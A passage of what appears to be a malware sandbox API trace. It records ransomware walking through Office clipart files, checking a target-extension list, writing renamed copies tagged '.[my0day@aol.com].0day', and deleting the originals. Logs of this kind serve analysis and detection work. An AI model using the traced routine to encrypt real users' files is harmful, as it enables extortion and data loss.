(lpString1=".1cd", lpString2=".WMF") returned -1 [0055.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0055.429] lstrlenW (lpString=".jpg") returned 4 [0055.429] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.003] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.003] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.003] GetLastError () returned 0x0 [0057.003] ReadFile (in: hFile=0x214, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0xa4c, lpOverlapped=0x0) returned 1 [0057.008] WriteFile (in: hFile=0x230, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xa50, lpOverlapped=0x0) returned 1 [0057.009] ReadFile (in: hFile=0x214, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.009] WriteFile (in: hFile=0x230, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.009] SetEndOfFile (hFile=0x230) returned 1 [0057.009] CloseHandle (hObject=0x230) returned 1 [0057.010] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.010] SetEndOfFile (hFile=0x214) returned 1 [0057.010] CloseHandle (hObject=0x214) returned 1 [0057.010] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.011] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf")) returned 1 [0057.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0057.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0057.011] lstrlenW (lpString=".doc") returned 4 [0057.011] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.011] lstrlenW (lpString=".docx") returned 5 [0057.011] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.011] lstrlenW (lpString=".pdf") returned 4 [0057.011] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.011] lstrlenW (lpString=".xls") returned 4 [0057.011] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.011] lstrlenW (lpString=".xlsx") returned 5 [0057.011] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.011] lstrlenW (lpString=".ppt") returned 4 [0057.011] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0057.011] lstrlenW (lpString=".zip") returned 4 [0057.011] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.011] lstrlenW (lpString=".rar") returned 4 [0057.012] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.012] lstrlenW (lpString=".bz2") returned 4 [0057.012] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.012] lstrlenW (lpString=".7z") returned 3 [0057.012] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0057.012] lstrlenW (lpString=".dbf") returned 4 [0057.012] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0057.012] lstrlenW (lpString=".1cd") returned 4 [0057.012] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0057.012] lstrlenW (lpString=".jpg") returned 4 [0057.012] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.012] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.012] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.012] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.013] GetLastError () returned 0x0 [0057.013] ReadFile (in: hFile=0x214, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x2d74, lpOverlapped=0x0) returned 1 [0057.035] WriteFile (in: hFile=0x230, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x2d80, lpOverlapped=0x0) returned 1 [0057.036] ReadFile (in: hFile=0x214, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.036] WriteFile (in: hFile=0x230, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.037] SetEndOfFile (hFile=0x230) returned 1 [0057.037] CloseHandle (hObject=0x230) returned 1 [0057.037] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.037] SetEndOfFile (hFile=0x214) returned 1 [0057.038] CloseHandle (hObject=0x214) returned 1 [0057.038] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.038] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf")) returned 1 [0057.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0057.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0057.038] lstrlenW (lpString=".doc") returned 4 [0057.038] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.038] lstrlenW (lpString=".docx") returned 5 [0057.038] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.038] lstrlenW (lpString=".pdf") returned 4 [0057.039] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.039] lstrlenW (lpString=".xls") returned 4 [0057.039] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.039] lstrlenW (lpString=".xlsx") returned 5 [0057.039] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.039] lstrlenW (lpString=".ppt") returned 4 [0057.039] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0057.039] lstrlenW (lpString=".zip") returned 4 [0057.039] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.039] lstrlenW (lpString=".rar") returned 4 [0057.039] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.039] lstrlenW (lpString=".bz2") returned 4 [0057.039] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.039] lstrlenW (lpString=".7z") returned 3 [0057.039] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0057.039] lstrlenW (lpString=".dbf") returned 4 [0057.039] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0057.039] lstrlenW (lpString=".1cd") returned 4 [0057.039] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0057.039] lstrlenW (lpString=".jpg") returned 4 [0057.039] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.054] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.054] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.054] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.054] GetLastError () returned 0x0 [0057.060] ReadFile (in: hFile=0x214, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x57f4, lpOverlapped=0x0) returned 1 [0057.116] WriteFile (in: hFile=0x230, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x5800, lpOverlapped=0x0) returned 1 [0057.117] ReadFile (in: hFile=0x214, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.117] WriteFile (in: hFile=0x230, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.118] SetEndOfFile (hFile=0x230) returned 1 [0057.118] CloseHandle (hObject=0x230) returned 1 [0057.118] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.118] SetEndOfFile (hFile=0x214) returned 1 [0057.119] CloseHandle (hObject=0x214) returned 1 [0057.119] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.119] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf")) returned 1 [0057.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0057.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0057.120] lstrlenW (lpString=".doc") returned 4 [0057.120] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.120] lstrlenW (lpString=".docx") returned 5 [0057.120] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.120] lstrlenW (lpString=".pdf") returned 4 [0057.120] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.120] lstrlenW (lpString=".xls") returned 4 [0057.120] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.120] lstrlenW (lpString=".xlsx") returned 5 [0057.120] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.120] lstrlenW (lpString=".ppt") returned 4 [0057.120] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0057.120] lstrlenW (lpString=".zip") returned 4 [0057.120] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.120] lstrlenW (lpString=".rar") returned 4 [0057.120] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.120] lstrlenW (lpString=".bz2") returned 4 [0057.120] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.120] lstrlenW (lpString=".7z") returned 3 [0057.120] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0057.120] lstrlenW (lpString=".dbf") returned 4 [0057.120] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0057.120] lstrlenW (lpString=".1cd") returned 4 [0057.120] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0057.120] lstrlenW (lpString=".jpg") returned 4 [0057.121] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.121] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.121] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.121] GetLastError () returned 0x0 [0057.121] ReadFile (in: hFile=0x214, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x687c, lpOverlapped=0x0) returned 1 [0057.180] WriteFile (in: hFile=0x230, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x6880, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x6880, lpOverlapped=0x0) returned 1 [0057.181] ReadFile (in: hFile=0x214, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.181] WriteFile (in: hFile=0x230, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.181] SetEndOfFile (hFile=0x230) returned 1 [0057.181] CloseHandle (hObject=0x230) returned 1 [0057.182] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.182] SetEndOfFile (hFile=0x214) returned 1 [0057.182] CloseHandle (hObject=0x214) returned 1 [0057.183] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.183] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf")) returned 1 [0057.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0057.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0057.314] lstrlenW (lpString=".doc") returned 4 [0057.314] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.314] lstrlenW (lpString=".docx") returned 5 [0057.314] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.314] lstrlenW (lpString=".pdf") returned 4 [0057.314] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.314] lstrlenW (lpString=".xls") returned 4 [0057.314] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.314] lstrlenW (lpString=".xlsx") returned 5 [0057.314] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.314] lstrlenW (lpString=".ppt") returned 4 [0057.314] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0057.314] lstrlenW (lpString=".zip") returned 4 [0057.314] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.314] lstrlenW (lpString=".rar") returned 4 [0057.314] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.314] lstrlenW (lpString=".bz2") returned 4 [0057.314] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.314] lstrlenW (lpString=".7z") returned 3 [0057.314] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0057.315] lstrlenW (lpString=".dbf") returned 4 [0057.315] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0057.315] lstrlenW (lpString=".1cd") returned 4 [0057.315] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0057.315] lstrlenW (lpString=".jpg") returned 4 [0057.315] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.315] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.315] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0057.315] GetLastError () returned 0x0 [0057.315] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x1f1e, lpOverlapped=0x0) returned 1 [0057.328] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x1f20, lpOverlapped=0x0) returned 1 [0057.331] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.331] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.332] SetEndOfFile (hFile=0x210) returned 1 [0057.332] CloseHandle (hObject=0x210) returned 1 [0057.332] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.332] SetEndOfFile (hFile=0x198) returned 1 [0057.333] CloseHandle (hObject=0x198) returned 1 [0057.333] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.333] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf")) returned 1 [0057.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0057.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0057.333] lstrlenW (lpString=".doc") returned 4 [0057.333] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.333] lstrlenW (lpString=".docx") returned 5 [0057.333] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.334] lstrlenW (lpString=".pdf") returned 4 [0057.334] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.334] lstrlenW (lpString=".xls") returned 4 [0057.334] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.334] lstrlenW (lpString=".xlsx") returned 5 [0057.334] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.334] lstrlenW (lpString=".ppt") returned 4 [0057.334] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0057.334] lstrlenW (lpString=".zip") returned 4 [0057.334] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.334] lstrlenW (lpString=".rar") returned 4 [0057.334] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.334] lstrlenW (lpString=".bz2") returned 4 [0057.334] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.334] lstrlenW (lpString=".7z") returned 3 [0057.334] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0057.334] lstrlenW (lpString=".dbf") returned 4 [0057.334] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0057.334] lstrlenW (lpString=".1cd") returned 4 [0057.334] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0057.334] lstrlenW (lpString=".jpg") returned 4 [0057.334] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.353] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.359] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0057.360] GetLastError () returned 0x0 [0057.360] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x4edd, lpOverlapped=0x0) returned 1 [0057.362] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x4ee0, lpOverlapped=0x0) returned 1 [0057.363] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.363] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.363] SetEndOfFile (hFile=0x210) returned 1 [0057.363] CloseHandle (hObject=0x210) returned 1 [0057.365] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | 